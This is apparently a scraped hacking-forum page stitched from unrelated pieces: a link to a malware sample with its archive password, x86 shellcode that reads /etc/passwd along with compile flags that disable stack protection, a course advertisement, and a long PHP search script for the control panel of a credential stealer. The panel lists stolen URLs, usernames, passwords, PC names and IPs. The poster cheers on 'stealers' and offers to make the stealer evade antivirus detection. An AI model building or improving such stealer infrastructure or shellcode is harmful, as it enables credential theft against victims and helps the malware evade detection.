Leaderboard

CVE-2014-9162/CVE-2014-09163 sample DOWNLOAD Parola: aW5mZWN0ZWQ=

1. Simple program that reads /etc/passwd file Shellcode: ( Download Link given in the end ) "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\ x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x 2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x8 0" Now we create a simple programt that will execute this code and Compile it using gcc –fno-stack-protector -z execstack code.c –o shellcode It will compile our code and program should work without any hindrance. Read more: http://dl.packetstormsecurity.net/papers/shellcode/re_shellcode.pdf

C++ : Best course to learn C++ - Learn C++ in just 45 days https://www.udemy.com/c-plus-plus/?couponCode=BBHF-SPECIAL

This is a fully working FIX for your search.php script. I repaired all the errors, and it doesn't repeat only the first one on the query on logs. I ALSO added "Search By:" paragraph that can search with URL,PC-NAME,IP,USER,PASS,IP and even a application! GOOD LUCK STEALERS! <?php require_once 'header.php'; head(); ?> <!--/span--> <div class="col-sm-9 col-md-9"> <div class="row-fluid"> <!-- block --> <br><div class="block"> <div class="navbar navbar-inner" role="navigation"> <div class="navbar-header"> <a class="navbar-brand">Search logs (URL Only)</a> </div> </div> <div class="block-content collapse in"> <div class="span12"> <form action="search.php" method="get"> <p> <label>URL:</label> <input name="keyword" type="text" value=""> <label>Search By:</label> <select name="select"> <option value="URL">URL</option> <option value="pcname">PC-NAME</option> <option value="username">Username</option> <option value="password">Password</option> <option value="ip">IP</option> <option value="app">Application</option> </select> </p> <br><input type="submit" class="btn btn-default" value="Search"/> </form> <?php if (@$_GET['delete-id']) { $id = (int) $_GET["delete-id"]; $query = mysql_query("DELETE FROM `data` where id='$id'"); echo "<br /><center>The log was removed successfully</center><br />"; echo "<meta http-equiv=Refresh content=2;url=dashboard.php>"; } function clear($str) { $clear = mysql_real_escape_string(htmlentities($str, ENT_QUOTES)); return $clear; } @$keyword = $_GET['keyword']; @$selectable=$_GET['select']; switch ($selectable) { case "URL": if (!empty($keyword)) { $clearstr = clear($keyword); $sql = "SELECT * FROM data WHERE url LIKE '%$clearstr%' ORDER BY id DESC"; $result = mysql_query($sql); $num = mysql_num_rows($result); if ($num == 0) { echo 'There are no logs'; } else { echo '<p>' . $num . ' results were found for your search</p>'; echo ' <table class="table table-bordered table-striped table-hover"> <tr> <th>App</th> <th>URL</th> <th>Username</th> <th>Password</th> <th>PC Name</th> <th>IP</th> <th>Time</th> </tr>'; while($row = mysql_fetch_assoc($result)) { echo ' <tr class="even"> <td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td> <td>' . $row['url'] . '</td> <td>' . $row['user'] . '</td> <td>' . $row['pass'] . '</td> <td>' . $row['pc_name'] . '</td> <td>' . $row['ip'] . '</td> <td>' . $row['time'] . '</td> <td> <a href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a> </td> </tr>'; } echo '</table>'; } break; } case "pcname": if (!empty($keyword)) { $clearstr = clear($keyword); $sql = "SELECT * FROM data WHERE pc_name LIKE '%$clearstr%' ORDER BY id DESC"; $result = mysql_query($sql); $num = mysql_num_rows($result); if ($num == 0) { echo 'There are no logs'; } else { echo '<p>' . $num . ' results were found for your search</p>'; echo ' <table class="table table-bordered table-striped table-hover"> <tr> <th>App</th> <th>URL</th> <th>Username</th> <th>Password</th> <th>PC Name</th> <th>IP</th> <th>Time</th> </tr>'; while($row = mysql_fetch_assoc($result)) { echo ' <tr class="even"> <td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td> <td>' . $row['url'] . '</td> <td>' . $row['user'] . '</td> <td>' . $row['pass'] . '</td> <td>' . $row['pc_name'] . '</td> <td>' . $row['ip'] . '</td> <td>' . $row['time'] . '</td> <td> <a href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a> </td> </tr>'; } echo '</table>'; } break; } case "username": if (!empty($keyword)) { $clearstr = clear($keyword); $sql = "SELECT * FROM data WHERE user LIKE '%$clearstr%' ORDER BY id DESC"; $result = mysql_query($sql); $num = mysql_num_rows($result); if ($num == 0) { echo 'There are no logs'; } else { echo '<p>' . $num . ' results were found for your search</p>'; echo ' <table class="table table-bordered table-striped table-hover"> <tr> <th>App</th> <th>URL</th> <th>Username</th> <th>Password</th> <th>PC Name</th> <th>IP</th> <th>Time</th> </tr>'; while($row = mysql_fetch_assoc($result)) { echo ' <tr class="even"> <td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td> <td>' . $row['url'] . '</td> <td>' . $row['user'] . '</td> <td>' . $row['pass'] . '</td> <td>' . $row['pc_name'] . '</td> <td>' . $row['ip'] . '</td> <td>' . $row['time'] . '</td> <td> <a href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a> </td> </tr>'; } echo '</table>'; } break; } case "password": if (!empty($keyword)) { $clearstr = clear($keyword); $sql = "SELECT * FROM data WHERE pass LIKE '%$clearstr%' ORDER BY id DESC"; $result = mysql_query($sql); $num = mysql_num_rows($result); if ($num == 0) { echo 'There are no logs'; } else { echo '<p>' . $num . ' results were found for your search</p>'; echo ' <table class="table table-bordered table-striped table-hover"> <tr> <th>App</th> <th>URL</th> <th>Username</th> <th>Password</th> <th>PC Name</th> <th>IP</th> <th>Time</th> </tr>'; while($row = mysql_fetch_assoc($result)) { echo ' <tr class="even"> <td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td> <td>' . $row['url'] . '</td> <td>' . $row['user'] . '</td> <td>' . $row['pass'] . '</td> <td>' . $row['pc_name'] . '</td> <td>' . $row['ip'] . '</td> <td>' . $row['time'] . '</td> <td> <a href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a> </td> </tr>'; } echo '</table>'; } break; } case "ip": if (!empty($keyword)) { $clearstr = clear($keyword); $sql = "SELECT * FROM data WHERE ip LIKE '%$clearstr%' ORDER BY id DESC"; $result = mysql_query($sql); $num = mysql_num_rows($result); if ($num == 0) { echo 'There are no logs'; } else { echo '<p>' . $num . ' results were found for your search</p>'; echo ' <table class="table table-bordered table-striped table-hover"> <tr> <th>App</th> <th>URL</th> <th>Username</th> <th>Password</th> <th>PC Name</th> <th>IP</th> <th>Time</th> </tr>'; while($row = mysql_fetch_assoc($result)) { echo ' <tr class="even"> <td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td> <td>' . $row['url'] . '</td> <td>' . $row['user'] . '</td> <td>' . $row['pass'] . '</td> <td>' . $row['pc_name'] . '</td> <td>' . $row['ip'] . '</td> <td>' . $row['time'] . '</td> <td> <a href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a> </td> </tr>'; } echo '</table>'; } break; } case "app": if (!empty($keyword)) { $clearstr = clear($keyword); $sql = "SELECT * FROM data WHERE app LIKE '%$clearstr%' ORDER BY id DESC"; $result = mysql_query($sql); $num = mysql_num_rows($result); if ($num == 0) { echo 'There are no logs'; } else { echo '<p>' . $num . ' results were found for your search</p>'; echo ' <table class="table table-bordered table-striped table-hover"> <tr> <th>App</th> <th>URL</th> <th>Username</th> <th>Password</th> <th>PC Name</th> <th>IP</th> <th>Time</th> </tr>'; while($row = mysql_fetch_assoc($result)) { echo ' <tr class="even"> <td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td> <td>' . $row['url'] . '</td> <td>' . $row['user'] . '</td> <td>' . $row['pass'] . '</td> <td>' . $row['pc_name'] . '</td> <td>' . $row['ip'] . '</td> <td>' . $row['time'] . '</td> <td> <a href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a> </td> </tr>'; } echo '</table>'; } break; } } ?> <hr /> </div> </div> </div> <!-- /block --> </div> <?php footer(); ?> For the creator of this project, if you need any help programming/reFUD the stealer or for beta testing please write me a PM.

@Aripipevant daca ai rabdarea sa citesti pe site o sa vezi de ce. lasand astea sper ca un moderator sa-si faca treaba si sa dea warn